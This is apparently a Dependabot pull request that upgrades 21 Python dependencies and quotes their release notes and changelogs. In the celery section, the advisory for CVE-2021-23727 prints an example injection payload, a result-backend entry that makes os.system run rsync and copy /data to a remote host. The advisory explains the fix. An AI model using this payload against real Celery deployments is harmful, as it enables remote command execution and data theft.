Bump the pip group across 1 directory with 21 updates #8

dependabot · 2024-06-26T17:50:58Z

Bumps the pip group with 21 updates in the /requirements directory:

Package	From	To
babel	`0.9.6`	`2.9.1`
bleach	`1.4`	`3.3.0`
celery	`3.0.24`	`5.2.2`
django	`1.6.2`	`3.2.25`
django-filter	`0.7`	`2.4.0`
djangorestframework	`2.3.12`	`3.15.2`
gitpython	`0.1.7`	`3.1.41`
gunicorn	`0.17.4`	`22.0.0`
html5lib	`0.999`	`0.999999999`
httplib2	`0.8.0`	`0.19.0`
oauth2	`1.5.211`	`1.9.0.post1`
protobuf	`2.5.0`	`3.18.3`
pymysql	`0.5`	`1.1.1`
requests	`2.0.0`	`2.32.2`
suds	`0.4`	`1.0.0`
jinja2	`2.7.2`	`3.1.4`
lxml	`2.2.6`	`4.9.1`
pillow	`2.3.0`	`10.3.0`
simplejson	`2.3.2`	`2.6.1`
django-debug-toolbar	`1.2`	`1.11.1`
psutil	`0.2.0`	`5.6.6`

Updates babel from 0.9.6 to 2.9.1

Release notes

Sourced from babel's releases.

Version 2.9.1

Bugfixes

The internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory. Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!

Version 2.9.0

Upcoming version support changes

This version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.

Improvements

CLDR: Use CLDR 37 – Aarni Koskela (#734)

Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (#741)

Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (#726)

Bugfixes

Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela

Import: Simplify iteration code in "import_cldr.py" – Felix Schwarz

Import: Stop using deprecated ElementTree methods "getchildren()" and "getiterator()" – Felix Schwarz

Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen

Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen

Tests: fix tests when using Python 3.9 – Felix Schwarz

Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne

Tests: Support Py.test 6.x – Aarni Koskela

Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (#724)

Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok

Documentation

Update parse_number comments – Brad Martin (#708)

Add iter to Catalog documentation – @CyanNani123

Version 2.8.1

This patch version only differs from 2.8.0 in that it backports in #752.

Version 2.8.0

Improvements

CLDR: Upgrade to CLDR 36.0 - Aarni Koskela (#679)

Messages: Don't even open files with the "ignore" extraction method - @sebleblanc (#678)

Bugfixes

Numbers: Fix formatting very small decimals when quantization is disabled - Lev Lybin, @miluChen (#662)

Messages: Attempt to sort all messages – Mario Frasca (#651, #606)

Docs

... (truncated)

Changelog

Sourced from babel's changelog.

Version 2.9.1

Bugfixes

* The internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory. Thank you to Chris Lyne of Tenable, Inc. for discovering the issue! Version 2.9.0

Upcoming version support changes

This version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.

Improvements


* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)
* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)
* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)
Bugfixes

* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela
* Import: Simplify iteration code in &quot;import_cldr.py&quot; – Felix Schwarz
* Import: Stop using deprecated ElementTree methods &quot;getchildren()&quot; and &quot;getiterator()&quot; – Felix Schwarz
* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen
* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen
* Tests: fix tests when using Python 3.9 – Felix Schwarz
* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne
* Tests: Support Py.test 6.x – Aarni Koskela
* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)
* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok
Documentation

</code></pre>

<ul>

<li>Update parse_number comments – Brad Martin (:gh:<code>708</code>)</li>

<li>Add <strong>iter</strong> to Catalog documentation – <a href="https://github.com/CyanNani123&quot;&gt;&lt;code&gt;@CyanNani123&lt;/code&gt;&lt;/a&gt;&lt;/li>

</ul>

<h2>Version 2.8.1</h2>

<p>This is solely a patch release to make running tests on Py.test 6+ possible.</p>

<p>Bugfixes</p>

<!-- raw HTML omitted -->

</blockquote>

<p>... (truncated)</p>

</details>

<details>

<summary>Commits</summary>
<ul>

<li>See full diff in <a href="https://github.com/python-babel/babel/commits/v2.9.1&quot;&gt;compare view</a></li>

</ul>

</details>
<br />


Updates bleach from 1.4 to 3.3.0

Changelog
Sourced from bleach's changelog.

Version 3.3.0 (February 1st, 2021)
Backwards incompatible changes

clean escapes HTML comments even when strip_comments=False

Security fixes

Fix bug 1621692 / GHSA-m6xf-fq7q-8743. See the advisory for details.

Features
None
Bug fixes
None
Version 3.2.3 (January 26th, 2021)
Security fixes
None
Features
None
Bug fixes

fix clean and linkify raising ValueErrors for certain inputs. Thank you @Google-Autofuzz.

Version 3.2.2 (January 20th, 2021)
Security fixes
None
Features

Migrate CI to Github Actions. Thank you @hugovk.

Bug fixes

fix linkify raising an IndexError on certain inputs. Thank you @Google-Autofuzz.



... (truncated)


Commits

79b7a3c Merge pull request from GHSA-vv2x-vrpj-qqpq
842fcb4 Update for v3.3.0 release
1334134 sanitizer: escape HTML comments
c045a8b Merge pull request #581 from mozilla/nit-fixes
491abb0 fix typo s/vnedoring/vendoring/
10b1c5d vendor: add html5lib-1.1.dist-info/REQUESTED
cd838c3 Merge pull request #579 from mozilla/validate-convert-entity-code-points
612b808 Update for v3.2.3 release
6879f6a html5lib_shim: validate unicode points for convert_entity
90cb80b Update for v3.2.2 release
Additional commits viewable in compare view




Updates celery from 3.0.24 to 5.2.2

Release notes
Sourced from celery's releases.

5.2.2
Release date: 2021-12-26 16:30 P.M UTC+2:00
Release by: Omer Katz


Various documentation fixes.


Fix CVE-2021-23727 (Stored Command Injection security
vulnerability).

When a task fails, the failure information is serialized in the
backend. In some cases, the exception class is only importable
from the consumer's code base. In this case, we reconstruct the
exception class so that we can re-raise the error on the process
which queried the task's result. This was introduced in #4836. If
the recreated exception type isn't an exception, this is a
security issue. Without the condition included in this patch, an
attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data") by
setting the task's result to a failure in the result backend with
the os, the system function as the exception type and the payload
rsync /data [email protected]:~/data as the exception
arguments like so:
{
      "exc_module": "os",
      'exc_type': "system",
      "exc_message": "rsync /data [email protected]:~/data"
}

According to my analysis, this vulnerability can only be exploited
if the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result. The attacker would also have to
gain access to the result backend. The severity of this security
vulnerability is low, but we still recommend upgrading.



v5.2.1
Release date: 2021-11-16 8.55 P.M UTC+6:00
Release by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.
Pass logfile to ExecStop in celery.service example systemd file.
fix: reduce latency of AsyncResult.get under gevent (#7052)
Limit redis version: <4.0.0.
Bump min kombu version to 5.2.2.
Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.



... (truncated)


Changelog
Sourced from celery's changelog.

5.2.2
:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz


Various documentation fixes.


Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:
.. code-block:: python
  {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }

According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.


.. _version-5.2.1:
5.2.1
:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.
Pass logfile to ExecStop in celery.service example systemd file.
fix: reduce latency of AsyncResult.get under gevent (#7052)
Limit redis version: <4.0.0.
Bump min kombu version to 5.2.2.



... (truncated)


Commits

b21c13d Bump version: 5.2.1 → 5.2.2
a60b486 Add changelog for 5.2.2.
3e5d630 Fix changelog formatting.
1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
2d8dbc2 Update configuration.rst
9596aba Fix typo in documentation
639ad83 update doc to reflect Celery 5.2.x (#7153)
d32356c Bump version: 5.2.0 → 5.2.1
6842a78 Merge branch 'master' of https://github.com/celery/celery
4c92cb7 changelog for v5.2.1
Additional commits viewable in compare view




Updates django from 1.6.2 to 3.2.25

Commits

c98eca3 [3.2.x] Bumped version for 3.2.25 release.
072963e [3.2.x] Fixed CVE-2024-27351 -- Prevented potential ReDoS in Truncator.words().
2ad2676 [3.2.x] Added release date for 3.2.25.
fc41af6 [3.2.x] Fixed #35172 -- Fixed intcomma for string floats.
b9170b4 [3.2.x] Added CVE-2024-24680 to security archive.
e5350a9 [3.2.x] Post release version bump.
f5c8808 [3.2.x] Bumped version for 3.2.24 release.
c1171ff [3.2.x] Fixed CVE-2024-24680 -- Mitigated potential DoS in intcomma template ...
9dc3456 [3.2.x] Added stub release notes 3.2.24.
90eae45 [3.2.x] Fixed documented alias of smart_text().
Additional commits viewable in compare view




Updates django-filter from 0.7 to 2.4.0

Release notes
Sourced from django-filter's releases.

Version 2.4.0


SECURITY: Added a MaxValueValidator to the form field for
NumberFilter. This prevents a potential DoS attack if numbers with very
large exponents were subsequently converted to integers.
The default limit value for the validator is 1e50.
The new NumberFilter.get_max_validator() allows customising the used
validator, and may return None to disable the validation entirely.


Added testing against Django 3.1 and Python 3.9.
In addition tests against Django main development branch are now required to
pass.


Version 2.3.0
https://github.com/carltongibson/django-filter/blob/master/CHANGES.rst#version-230-2020-6-5
Version 2.2
Highlights:

Added DjangoFilterBackend.get_schema_operation_parameters() for DRF 3.10+
OpenAPI schema generation. (#1086)
Added lookup_expr to MultipleChoiceFilter (#1054)
Dropped support for EOL Python 3.4

Version 2.1.0


Fixed a regression in FilterView introduced in 2.0. An empty QuerySet was
incorrectly used whenever the FilterSet was unbound (i.e. when there were
no GET parameters).  The correct, pre-2.0 behaviour is now restored.
A workaround was to set strict=False on the FilterSet. This is no
longer necessary, so you may restore strict behaviour as desired.


Added IsoDateTimeFromToRangeFilter. Allows From-To filtering using
ISO-8601 formatted dates.


Version 2.0
2.0 introduced a number of small changes and tidy-ups.
Please see the migration guide:
https://django-filter.readthedocs.io/en/master/guide/migration.html#migrating-to-2-0

Added testing for Python 3.7 (#944)
Improve exception message for invalid filter result (#943)
Test QueryDict against CSV filters (#937)
Add renderer argument to render() method of BooleanWidget (#923)
Fix lookups for reverse relationships (#915)
Refactor backend filterset instantiation (#865)
Improve view-related attribute name consistency (#867)



... (truncated)


Changelog
Sourced from django-filter's changelog.

Version 2.4.0 (2020-9-27)


SECURITY: Added a MaxValueValidator to the form field for
NumberFilter. This prevents a potential DoS attack if numbers with very
large exponents were subsequently converted to integers.
The default limit value for the validator is 1e50.
The new NumberFilter.get_max_validator() allows customising the used
validator, and may return None to disable the validation entirely.


Added testing against Django 3.1 and Python 3.9.
In addition tests against Django main development branch are now required to
pass.


Version 2.3.0 (2020-6-5)

Fixed import of FieldDoesNotExist. (#1127)
Added testing against Django 3.0. (#1125)
Declared support for, and added testing against, Python 3.8. (#1138)
Fix filterset multiple inheritance bug (#1131)
Allowed customising default lookup expression. (#1129)
Drop Django 2.1 and below (#1180)
Fixed IsoDateTimeRangeFieldTests for Django 3.1
Require tests to pass against Django master.

Version 2.2 (2019-7-16)

Added DjangoFilterBackend.get_schema_operation_parameters() for DRF 3.10+
OpenAPI schema generation. (#1086)
Added lookup_expr to MultipleChoiceFilter (#1054)
Dropped support for EOL Python 3.4

Version 2.1 (2019-1-20)


Fixed a regression in FilterView introduced in 2.0. An empty QuerySet was
incorrectly used whenever the FilterSet was unbound (i.e. when there were
no GET parameters).  The correct, pre-2.0 behaviour is now restored.
A workaround was to set strict=False on the FilterSet. This is no
longer necessary, so you may restore strict behaviour as desired.




... (truncated)


Commits

7821072 Postpone move to CalVer.
fd5824e Restore version declaration in setup.py.
c9daa68 Version 20.9.0.
c045bbe Droped using bumpversion.
b1f56ed Use single version reference from main module.
451d372 Update docs copyright year.
82c9a42 Added MaxValueValidator to NumberFilter.
2ebce74 Confirmed compatibility with Python 3.9. (#1270)
85c9572 Run tests with GitHub Actions
d9f389f Update Jinja test dependency.
Additional commits viewable in compare view




Updates djangorestframework from 2.3.12 to 3.15.2

Release notes
Sourced from djangorestframework's releases.

Version 3.15.1
What's Changed

Update the message to be consistent with the Django `HttpResponseBa… by @maycuatroi in encode/django-rest-framework#9287
Make inflection package truly optional by @browniebroke in encode/django-rest-framework#9303
Fix broken links in release notes for 3.15 by @browniebroke in encode/django-rest-framework#9305
TokenAdmin.autocomplete_fields Breaks Some Use Cases, Revert by @alexdlaird in encode/django-rest-framework#9301
Add drf-sendables to third-party-packages.md by @amikrop in encode/django-rest-framework#9261
Revert "feat: Add some changes to ValidationError to support django style vad…" by @auvipy in encode/django-rest-framework#9326
Revert "Re-prefetch related objects after updating" by @auvipy in encode/django-rest-framework#9327
Revert #8863 by @tomchristie in encode/django-rest-framework#9330
Revert #8009 by @tomchristie in encode/django-rest-framework#9332
Revert #9030 by @tomchristie in encode/django-rest-framework#9333
Revert "Fix NamespaceVersioning ignoring DEFAULT_VERSION on non-None namespaces" by @auvipy in encode/django-rest-framework#9335
SearchFilter.get_search_terms returns list. by @tomchristie in encode/django-rest-framework#9338
Version 3.15.1 by @tomchristie in encode/django-rest-framework#9339

New Contributors

@maycuatroi made their first contribution in encode/django-rest-framework#9287
@alexdlaird made their first contribution in encode/django-rest-framework#9301

Full Changelog: https://github.com/encode/django-rest-framework/compare/3.15.0...3.15.1
Version 3.14.0

Django 2.2 is no longer supported. #8662
Django 4.1 compatibility. #8591
Add --api-version CLI option to generateschema management command. #8663
Enforce is_valid(raise_exception=False) as a keyword-only argument. #7952
Stop calling set_context on Validators. #8589
Return NotImplemented from ErrorDetails.__ne__. #8538
Don't evaluate DateTimeField.default_timezone when a custom timezone is set. #8531
Make relative URLs clickable in Browseable API. #8464
Support ManyRelatedField falling back to the default value when the attribute specified by dot notation doesn't exist. Matches ManyRelatedField.get_attribute to Field.get_attribute. #7574
Make schemas.openapi.get_reference public. #7515
Make ReturnDict support dict union operators on Python 3.9 and later. #8302
Update throttling to check if request.user is set before checking if the user is authenticated. #8370

Version 3.13.1

Revert schema naming changes with function based @api_view. #8297

Version 3.13.0

Django 4.0 compatability. #8178
Add max_length and min_length options to ListSerializer. #8165
Add get_request_serializer and get_response_serializer hooks to AutoSchema. #7424
Fix OpenAPI representation of null-able read only fields. #8116
Respect UNICODE_JSON setting in API schema outputs. #7991
Fix for RemoteUserAuthentication. #7158
Make Field constructors keyword-only. #7632

3.12.4
No release notes provided.


... (truncated)


Commits

c7a7eae Version 3.15.2 (#9439)
3b41f01 Fix potential XSS vulnerability in break_long_headers template filter (#9435)
fe92f0d Add __hash__ method for permissions.OperandHolder class (#9417)
fbdab09 docs: Correct some evaluation results and a httpie option in Tutorial1 (#9421)
36d5c0e tests: Check urlpatterns after cleanups (#9400)
9d4ed05 Don't use Windows line endings
b34bde4 Fix typo in setup.cfg setting
ab681f2 Update requirements in docs
2237724 bump pygments (security hygiene)
d58b8da Update deprecation hints
Additional commits viewable in compare view




Updates gitpython from 0.1.7 to 3.1.41

Release notes
Sourced from gitpython's releases.

3.1.41 - fix Windows security issue
The details about the Windows security issue can be found in this advisory.
Special thanks go to @EliahKagan who reported the issue and fixed it in a single stroke, while being responsible for an incredible amount of improvements that he contributed over the last couple of months ❤️.
What's Changed

Add __all__ in git.exc by @EliahKagan in gitpython-developers/GitPython#1719
Set submodule update cadence to weekly by @EliahKagan in gitpython-developers/GitPython#1721
Never modify sys.path by @EliahKagan in gitpython-developers/GitPython#1720
Bump git/ext/gitdb from 8ec2390 to ec58b7e by @dependabot in gitpython-developers/GitPython#1722
Revise comments, docstrings, some messages, and a bit of code by @EliahKagan in gitpython-developers/GitPython#1725
Use zero-argument super() by @EliahKagan in gitpython-developers/GitPython#1726
Remove obsolete note in _iter_packed_refs by @EliahKagan in gitpython-developers/GitPython#1727
Reorganize test_util and make xfail marks precise by @EliahKagan in gitpython-developers/GitPython#1729
Clarify license and make module top comments more consistent by @EliahKagan in gitpython-developers/GitPython#1730
Deprecate compat.is_, rewriting all uses by @EliahKagan in gitpython-developers/GitPython#1732
Revise and restore some module docstrings by @EliahKagan in gitpython-developers/GitPython#1735
Make the rmtree callback Windows-only by @EliahKagan in gitpython-developers/GitPython#1739
List all non-passing tests in test summaries by @EliahKagan in gitpython-developers/GitPython#1740
Document some minor subtleties in test_util.py by @EliahKagan in gitpython-developers/GitPython#1749
Always read metadata files as UTF-8 in setup.py by @EliahKagan in gitpython-developers/GitPython#1748
Test native Windows on CI by @EliahKagan in gitpython-developers/GitPython#1745
Test macOS on CI by @EliahKagan in gitpython-developers/GitPython#1752
Let close_fds be True on all platforms by @EliahKagan in gitpython-developers/GitPython#1753
Fix IndexFile.from_tree on Windows by @EliahKagan in gitpython-developers/GitPython#1751
Remove unused TASKKILL fallback in AutoInterrupt by @EliahKagan in gitpython-developers/GitPython#1754
Don't return with operand when conceptually void by @EliahKagan in gitpython-developers/GitPython#1755
Group .gitignore entries by purpose by @EliahKagan in gitpython-developers/GitPython#1758
Adding dubious ownership handling by @marioaag in gitpython-developers/GitPython#1746
Avoid brittle assumptions about preexisting temporary files in tests by @EliahKagan in gitpython-developers/GitPython#1759
Overhaul noqa directives by @EliahKagan in gitpython-developers/GitPython#1760
Clarify some Git.execute kill_after_timeout limitations by @EliahKagan in gitpython-developers/GitPython#1761
Bump actions/setup-python from 4 to 5 by @dependabot in gitpython-developers/GitPython#1763
Don't install black on Cygwin by @EliahKagan in gitpython-developers/GitPython#1766
Extract all "import gc" to module level by @EliahKagan in gitpython-developers/GitPython#1765
Extract remaining local "import gc" to module level by @EliahKagan in gitpython-developers/GitPython#1768
Replace xfail with gc.collect in TestSubmodule.test_rename by @EliahKagan in gitpython-developers/GitPython#1767
Enable CodeQL by @EliahKagan in gitpython-developers/GitPython#1769
Replace some uses of the deprecated mktemp function by @EliahKagan in gitpython-developers/GitPython#1770
Bump github/codeql-action from 2 to 3 by @dependabot in gitpython-developers/GitPython#1773
Run some Windows environment variable tests only on Windows by @EliahKagan in gitpython-developers/GitPython#1774
Fix TemporaryFileSwap regression where file_path could not be Path by @EliahKagan in gitpython-developers/GitPython#1776
Improve hooks tests by @EliahKagan in gitpython-developers/GitPython#1777
Fix if items of Index is of type PathLike by @stegm in gitpython-developers/GitPython#1778
Better document IterableObj.iter_items and improve some subclasses by @EliahKagan in gitpython-developers/GitPython#1780
Revert "Don't install black on Cygwin" by @EliahKagan in gitpython-developers/GitPython#1783
Add missing pip in $PATH on Cygwin CI by @EliahKagan in gitpython-developers/GitPython#1784
Shorten Iterable docstrings and put IterableObj first by @EliahKagan in gitpython-developers/GitPython#1785
Fix incompletely revised Iterable/IterableObj docstrings by @EliahKagan in gitpython-developers/GitPython#1786
Pre-deprecate setting Git.USE_SHELL by @EliahKagan in gitpython-developers/GitPython#1782



... (truncated)


Commits

f288738 bump patch level
ef3192c Merge pull request #1792 from EliahKagan/popen
1f3caa3 Further clarify comment in test_hook_uses_shell_not_from_cwd
3eb7c2a Move safer_popen from git.util to git.cmd
c551e91 Extract shared logic for using Popen safely on Windows
15ebb25 Clarify comment in test_hook_uses_shell_not_from_cwd
f44524a Avoid spurious "location may have moved" on Windows
a42ea0a Cover absent/no-distro bash.exe in hooks "not from cwd" test
7751436 Extract venv management from test_installation
66ff4c1 Omit CWD in search for bash.exe to run hooks on Windows
Additional commits viewable in compare view




Updates gunicorn from 0.17.4 to 22.0.0

Release notes
Sourced from gunicorn's releases.

Gunicorn 22.0 has been released
Gunicorn 22.0.0 has been released. This version fix the numerous security vulnerabilities. You're invited to upgrade asap your own installation.
Changes:
22.0.0 - 2024-04-17
===================

use utime to notify workers liveness
migrate setup to pyproject.toml
fix numerous security vulnerabilities in HTTP parser (closing some request smuggling vectors)
parsing additional requests is no longer attempted past unsupported request framing
on HTTP versions < 1.1 support for chunked transfer is refused (only used in exploits)
requests conflicting configured or passed SCRIPT_NAME now produce a verbose error
Trailer fields are no longer inspected for headers indicating secure scheme
support Python 3.12

** Breaking changes **

minimum version is Python 3.7
the limitations on valid characters in the HTTP method have been bounded to Internet Standards
requests specifying unsupported transfer coding (order) are refused by default (rare)
HTTP methods are no longer casefolded by default (IANA method registry contains none affected)
HTTP methods containing the number sign (#) are no longer accepted by default (rare)
HTTP versions < 1.0 or >= 2.0 are no longer accepted by default (rare, only HTTP/1.1 is supported)
HTTP versions consisting of multiple digits or containing a prefix/suffix are no longer accepted
HTTP header field names Gunicorn cannot safely map to variables are silently dropped, as in other software
HTTP headers with empty field name are refused by default (no legitimate use cases, used in exploits)
requests with both Transfer-Encoding and Content-Length are refused by default (such a message might indicate an attempt to perform request smuggling)
empty transfer codings are no longer permitted (reportedly seen with really old & broken proxies)

** SECURITY **

fix CVE-2024-1135




Documentation is available there: https://docs.gunicorn.org/en/stable/news.html
Packages: https://pypi.org/project/gunicorn/

Gunicorn 21.2.0 has been released
Gunicorn 21.2.0 has been released. This version fix the issue introduced in the threaded worker.
Changes:
21.2.0 - 2023-07-19
===================
fix thread worker: revert change considering connection as idle .
</tr></table> 


... (truncated)


Commits

f63d59e bump to 22.0
4ac81e0 Merge pull request #3175 from e-kwsm/typo
401cecf Merge pull request #3179 from dhdaines/exclude-eventlet-0360
0243ec3 fix(deps): exclude eventlet 0.36.0
628a0bc chore: fix typos
88fc4a4 Merge pull request #3131 from pajod/patch-py12-rebased
deae2fc CI: back off the agressive timeout
f470382 docs: promise 3.12 compat
5e30bfa add changelog to project.urls (updated for PEP621)
481c3f9 remove setup.cfg - overridden by pyproject.toml
Additional commits viewable in compare view




Updates html5lib from 0.999 to 0.999999999

Changelog
Sourced from html5lib's changelog.


Commits

6a73efa Yes, another release, already. :(
e0dc25f Fix attribute order to the treebuilder to be document order
a3b8252 Back to -dev
ebf6225 0.99999999 release! Let's party!
a8ba43e Merge pull request #270 from gsnedders/rename_stuff
8cb144b Update the docs after all the renaming and add CHANGES
00977d6 Rename a bunch of serializer module variables to be underscore prefixed
18a7102 Have only one set of allowed elements/attributes for the sanitizer
c4dd677 Move a whole bunch of private modules to be underscore prefixed
8db5828 Rename treewalkers.lxmletree to .etree_lxml for consistency
Additional commits viewable in compare view




Updates httplib2 from 0.8.0 to 0.19.0

Changelog
Sourced from httplib2's changelog.

0.19.0
auth: parse headers using pyparsing instead of regexp
httplib2/httplib2#182
auth: WSSE token needs to be string not bytes
httplib2/httplib2#179
0.18.1
explicit build-backend workaround for pip build isolation bug
"AttributeError: 'module' object has no attribute 'legacy'" on pip install
httplib2/httplib2#169
0.18.0
IMPORTANT security vulnerability CWE-93 CRLF injection
Force %xx quote of space, CR, LF characters in uri.
Special thanks to Recar https://github.com/Ciyfly for discrete notification.
https://cwe.mitre.org/data/definitions/93.html
0.17.4
Ship test suite in source dist
httplib2/httplib2#168
0.17.3
IronPython2.7: relative import iri2uri fixes ImportError
httplib2/httplib2#163
0.17.2
python3 + debug + IPv6 disabled: https raised
"IndexError: Replacement index 1 out of range for positional args tuple"
httplib2/httplib2#161
0.17.1
python3: no_proxy was not checked with https
httplib2/httplib2#160
0.17.0
feature: Http().redirect_codes set, works after follow(_all)_redirects check
This allows one line workaround for old gcloud library that uses 308
response without redirect semantics.
httplib2/httplib2#156
0.16.0


... (truncated)


Commits

See full diff in compare view




Updates oauth2 from 1.5.211 to 1.9.0.post1

Commits

See full diff in compare view




Updates protobuf from 2.5.0 to 3.18.3

Release notes
Sourced from protobuf's releases.

Protocol Buffers v3.18.3
C++

Reduce memory consumption of MessageSet parsing
This release addresses a Security Advisory for C++ and Python users

Protocol Buffers v3.18.2
Java

Improve performance characteristics of UnknownFieldSet parsing (#9371)

Protocol Buffers v3.18.1
Python

Update setup.py to reflect that we now require at least Python 3.5 (#8989)
Performance fix for DynamicMessage: force GetRaw() to be inlined (#9023)

Ruby

Update ruby_generator.cc to allow proto2 imports in proto3 (#9003)

Protocol Buffers v3.18.0
C++

Fix warnings raised by clang 11 (#8664)
Make StringPiece constructible from std::string_view (#8707)
Add missing capability attributes for LLVM 12 (

Bumps the pip group with 21 updates in the /requirements directory: | Package | From | To | | --- | --- | --- | | [babel](https://github.com/python-babel/babel) | `0.9.6` | `2.9.1` | | [bleach](https://github.com/mozilla/bleach) | `1.4` | `3.3.0` | | [celery](https://github.com/celery/celery) | `3.0.24` | `5.2.2` | | [django](https://github.com/django/django) | `1.6.2` | `3.2.25` | | [django-filter](https://github.com/carltongibson/django-filter) | `0.7` | `2.4.0` | | [djangorestframework](https://github.com/encode/django-rest-framework) | `2.3.12` | `3.15.2` | | [gitpython](https://github.com/gitpython-developers/GitPython) | `0.1.7` | `3.1.41` | | [gunicorn](https://github.com/benoitc/gunicorn) | `0.17.4` | `22.0.0` | | [html5lib](https://github.com/html5lib/html5lib-python) | `0.999` | `0.999999999` | | [httplib2](https://github.com/httplib2/httplib2) | `0.8.0` | `0.19.0` | | [oauth2](https://github.com/joestump/python-oauth2) | `1.5.211` | `1.9.0.post1` | | [protobuf](https://github.com/protocolbuffers/protobuf) | `2.5.0` | `3.18.3` | | [pymysql](https://github.com/PyMySQL/PyMySQL) | `0.5` | `1.1.1` | | [requests](https://github.com/psf/requests) | `2.0.0` | `2.32.2` | | [suds](https://github.com/suds-community/suds) | `0.4` | `1.0.0` | | [jinja2](https://github.com/pallets/jinja) | `2.7.2` | `3.1.4` | | [lxml](https://github.com/lxml/lxml) | `2.2.6` | `4.9.1` | | [pillow](https://github.com/python-pillow/Pillow) | `2.3.0` | `10.3.0` | | [simplejson](https://github.com/simplejson/simplejson) | `2.3.2` | `2.6.1` | | [django-debug-toolbar](https://github.com/jazzband/django-debug-toolbar) | `1.2` | `1.11.1` | | [psutil](https://github.com/giampaolo/psutil) | `0.2.0` | `5.6.6` | Updates `babel` from 0.9.6 to 2.9.1 - [Release notes](https://github.com/python-babel/babel/releases) - [Changelog](https://github.com/python-babel/babel/blob/master/CHANGES.rst) - [Commits](https://github.com/python-babel/babel/commits/v2.9.1) Updates `bleach` from 1.4 to 3.3.0 - [Changelog](https://github.com/mozilla/bleach/blob/main/CHANGES) - [Commits](mozilla/bleach@v1.4...v3.3.0) Updates `celery` from 3.0.24 to 5.2.2 - [Release notes](https://github.com/celery/celery/releases) - [Changelog](https://github.com/celery/celery/blob/main/Changelog.rst) - [Commits](celery/celery@v3.0.24...v5.2.2) Updates `django` from 1.6.2 to 3.2.25 - [Commits](django/django@1.6.2...3.2.25) Updates `django-filter` from 0.7 to 2.4.0 - [Release notes](https://github.com/carltongibson/django-filter/releases) - [Changelog](https://github.com/carltongibson/django-filter/blob/main/CHANGES.rst) - [Commits](carltongibson/django-filter@v0.7...2.4.0) Updates `djangorestframework` from 2.3.12 to 3.15.2 - [Release notes](https://github.com/encode/django-rest-framework/releases) - [Commits](encode/django-rest-framework@2.3.12...3.15.2) Updates `gitpython` from 0.1.7 to 3.1.41 - [Release notes](https://github.com/gitpython-developers/GitPython/releases) - [Changelog](https://github.com/gitpython-developers/GitPython/blob/main/CHANGES) - [Commits](gitpython-developers/GitPython@0.1.7...3.1.41) Updates `gunicorn` from 0.17.4 to 22.0.0 - [Release notes](https://github.com/benoitc/gunicorn/releases) - [Commits](benoitc/gunicorn@0.17.4...22.0.0) Updates `html5lib` from 0.999 to 0.999999999 - [Changelog](https://github.com/html5lib/html5lib-python/blob/master/CHANGES.rst) - [Commits](html5lib/html5lib-python@0.999...0.999999999) Updates `httplib2` from 0.8.0 to 0.19.0 - [Changelog](https://github.com/httplib2/httplib2/blob/master/CHANGELOG) - [Commits](https://github.com/httplib2/httplib2/commits/v0.19.0) Updates `oauth2` from 1.5.211 to 1.9.0.post1 - [Commits](https://github.com/joestump/python-oauth2/commits) Updates `protobuf` from 2.5.0 to 3.18.3 - [Release notes](https://github.com/protocolbuffers/protobuf/releases) - [Changelog](https://github.com/protocolbuffers/protobuf/blob/main/protobuf_release.bzl) - [Commits](protocolbuffers/protobuf@v2.5.0...v3.18.3) Updates `pymysql` from 0.5 to 1.1.1 - [Release notes](https://github.com/PyMySQL/PyMySQL/releases) - [Changelog](https://github.com/PyMySQL/PyMySQL/blob/main/CHANGELOG.md) - [Commits](PyMySQL/PyMySQL@pymysql-0.5...v1.1.1) Updates `requests` from 2.0.0 to 2.32.2 - [Release notes](https://github.com/psf/requests/releases) - [Changelog](https://github.com/psf/requests/blob/main/HISTORY.md) - [Commits](psf/requests@2.0...v2.32.2) Updates `suds` from 0.4 to 1.0.0 - [Changelog](https://github.com/suds-community/suds/blob/master/CHANGELOG.md) - [Commits](https://github.com/suds-community/suds/commits/v1.0.0) Updates `jinja2` from 2.7.2 to 